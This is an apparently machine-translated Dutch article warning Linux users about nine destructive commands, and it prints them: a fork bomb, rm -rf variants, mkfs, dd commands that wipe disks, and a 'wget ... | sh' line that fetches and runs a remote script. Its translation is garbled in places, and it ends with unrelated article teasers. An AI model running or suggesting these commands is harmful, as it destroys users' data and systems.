9 Linux-opdrachten en codes om op te passen
Linux shell / terminal-opdrachten zijn erg krachtig en slechts een eenvoudige opdracht zou kunnen leiden tot het verwijderen van een map, bestanden of hoofdmap, enz.
In sommige gevallen vraagt Linux je niet eens om bevestiging, maar voert het de opdracht meteen uit, waardoor je waardevolle gegevens en informatie verliest die in deze bestanden en mappen zijn opgeslagen.
Het is gebruikelijk dat mensen inhoud plaatsen op het web die nieuwe Linux-gebruikers aanbeveelt om deze opdrachten uit te voeren . Dit lijkt misschien een grap voor iemand die de inhoud heeft gepost maar het is geen lachertje voor de persoon aan de andere kant.
We hebben een aantal Linux-commando's verzameld die behoorlijk schadelijk zijn voor je systeem om je te helpen ze te vermijden. Onthoud dat ze inderdaad gevaarlijk zijn en zelfs op verschillende manieren kunnen worden gewijzigd om nieuwe opdrachten te produceren die meer schade kunnen aanrichten.
Een belangrijk ding om op te merken is dat sommige van deze commando's alleen gevaarlijk zijn als ze worden voorafgegaan door sudo op Ubuntu . Op andere distributies van Linux zijn de meeste van deze gegeven opdrachten gevaarlijk om als root uit te voeren.
Bekijk de 9 opdrachten en codes die u niet moet uitvoeren.
1. Linux Fork Bomb Command
:(){ :|: & };:
ook wel bekend als Fork Bomb is een denial-of-service-aanval op een Linux-systeem. :(){ :|: & };:
is een bash-functie. Als het eenmaal is uitgevoerd, herhaalt het zichzelf meerdere keren totdat het systeem vastloopt .
Je kunt er alleen vanaf komen door je systeem opnieuw op te starten. Dus wees voorzichtig bij het uitvoeren van deze opdracht op je Linux-shell.
2. mv map / dev / null Commando
mv folder/dev/null
is een ander riskant commando. Dev/null
of null device
is een apparaatbestand dat alle erop geschreven gegevens verwijdert, maar het meldt dat de schrijfbewerking met succes is uitgevoerd . Het is ook bekend als bit bucked of black hole .
3. rm-rf commando
rm -rf
opdracht is een snelle manier om een map en de inhoud ervan in het Linux-besturingssysteem te verwijderen. Als u niet weet hoe u het goed moet gebruiken, kan het erg gevaarlijk worden voor het systeem. De meest voorkomende combinaties en opties die worden gebruikt met de opdracht rm-rf worden hieronder vermeld:
rm
opdracht wordt gebruikt om de bestanden in het Linux-systeem te verwijderen.rm -f
commando verwijdert alleen-lezen bestanden in de map zonder vragen.rm -r
commando verwijdert de inhoud van een map recursief.rm -d
opdrachtrm -d
wordt gebruikt om een lege map te verwijderen, maar deze weigert de map te verwijderen als deze niet leeg is.rm -rf/
command wordt gebruikt voor geforceerd verwijderen (het verwijdert het zelfs als het is beveiligd tegen schrijven) van alle inhoud in de hoofdmap en submappen.rm -rf*
commando wordt gebruikt voor geforceerde verwijdering van alle inhoud in de huidige map (directory waarin u momenteel werkt) en submappen.rm -rf.
commando wordt gebruikt voor geforceerd verwijderen van alle inhoud in de huidige map en submappen. De opdrachtrm -r.[^.]*
Kan ook worden gebruikt.rm -i
opdrachtrm -i
wordt gebruikt voor het verwijderen van bestanden en mappen, maar er verschijnt een vraag voordat deze wordt verwijderd.
4. opdracht mkfs
mkfs
kan een gevaarlijk commando zijn voor je op Linux gebaseerde systeem als je het doel ervan niet kent. Alles dat na de mkfs wordt geschreven, wordt geformatteerd en vervangen door een leeg Linux-bestandssysteem .
Alle onderstaande commando's zullen de harde schijf formatteren en het vereist beheerdersrechten:
mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos
mkfs.reiserfs
mkfs.vfat
Het commando mkfs.cramfs
zal hetzelfde doen als het bovenstaande, maar het vereist geen beheerdersrechten om uit te voeren.
5. Tar Bomb
De tar
opdracht wordt gebruikt voor het combineren van meerdere bestanden in een enkel bestand (gearchiveerd bestand) in .tar- indeling. Met deze opdracht kan een Tape Archive (Tar) bom worden gemaakt.
Het is een archiefbestand dat ontploft in duizenden of miljoenen bestanden met namen die lijken op de bestaande bestanden in de huidige map in plaats van in een nieuwe map als ze niet zijn opgeheven.
Je kunt voorkomen dat je slachtoffer wordt van een teerbom door regelmatig een nieuwe beschermende map aan te maken wanneer je een tar-bestand ontvangt en vervolgens het ontvangen tar-bestand naar deze map te verplaatsen voordat je ontslaat.
Als het tar-bestand inderdaad een teerbom is, kun je eenvoudigweg de zojuist gemaakte directory verwijderen om ervan af te komen. Een andere manier om de explosie van een teerbom te voorkomen, is via de optie -t
om alle inhoud van een tar-bestand op te sommen om u een idee te geven van het type inhoud dat zich in het tar-bestand bevindt.
6. Opdracht dd
De opdracht dd
wordt gebruikt voor het kopiëren en converteren van partities op de harde schijf . Het kan echter schadelijk zijn als u de verkeerde bestemming opgeeft.
Het commando kan een van deze zijn:
dd if=/dev/hda of=/dev/hdb
dd if=/dev/hda of=/dev/sdb
dd if=something of=/dev/hda
dd if=something of=/dev/sda
Met de volgende opdracht wordt de gehele primaire vaste schijf dd if=/dev/zero of=/dev/had
: dd if=/dev/zero of=/dev/had
7. Shell-scriptcode
Iemand kan je het slachtoffer maken door je de link naar een shell-script te geven en je te bevestigen om het te downloaden en uit te voeren . Het script bevat mogelijk kwaadaardige of gevaarlijke code. Het formaat van de opdracht kan er als volgt uitzien: wget http://some_malicious_source -O- | sh
wget http://some_malicious_source -O- | sh
. De wget
zal het script downloaden terwijl de sh de uitvoering van het script downloadt.
8. Kwaadaardige broncode
Iemand geeft je de broncode en vraagt je om het te compileren. De code lijkt misschien een normale code te zijn, maar in feite is sommige schadelijke code verborgen in de grote broncode en kan het uw systeem beschadigen. Om te voorkomen dat je slachtoffer wordt van dit soort aanvallen, accepteer en compileer je je broncode alleen van betrouwbare bronnen .
9. Decompressiebom
U hebt een gecomprimeerd bestand ontvangen en u wordt gevraagd om dit bestand uit te pakken, dat erg klein lijkt te zijn, maar mogelijk enkele KB bevat. In feite bevat dit gecomprimeerde bestand van kleine omvang zeer sterk gecomprimeerde gegevens .
Nadat het bestand is gedecomprimeerd, worden honderden GB gegevens geëxtraheerd die uw harde schijf kunnen opvullen om de prestaties van uw systeem te verminderen. Om deze situatie te voorkomen, moet u altijd onthouden dat u gegevens uit betrouwbare bronnen accepteert.
Samantha Lee speelt met haar eten met heerlijk verbluffende resultaten
Er zijn tal van creatieve mensen die werken met onconventionele media. Voor Samantha Lee bleek haar mediumkeuze eten.Samantha Lee, die afkomstig is uit Maleisië, verwijst naar zichzelf als een 'food artist' en is geïnspireerd door de populaire cultuur en de dingen om haar heen . Ze maakt al sinds 2008 haar culinaire meesterwerken, maar begon aandacht te trekken toen ze ze in 2011 begon te delen op Instagram.N
10 Hulpmiddelen om de computer te beschermen tegen geïnfecteerde USB-flashstations
We gebruiken het op regelmatige basis; het helpt ons handig om bestanden over te zetten van desktop naar laptops of zelfs om de inhoud met onze peers te delen. Het maakt het leven gemakkelijker. Maar wacht, heb je zijn bedreiging voor onze computer over het hoofd gezien?Als de USB-flashdrive is geïnfecteerd met een virus, raken niet alleen de gegevens in de opslag mogelijk verloren, maar heeft u ook invloed op de beveiliging van elke computer nadat deze is aangesloten.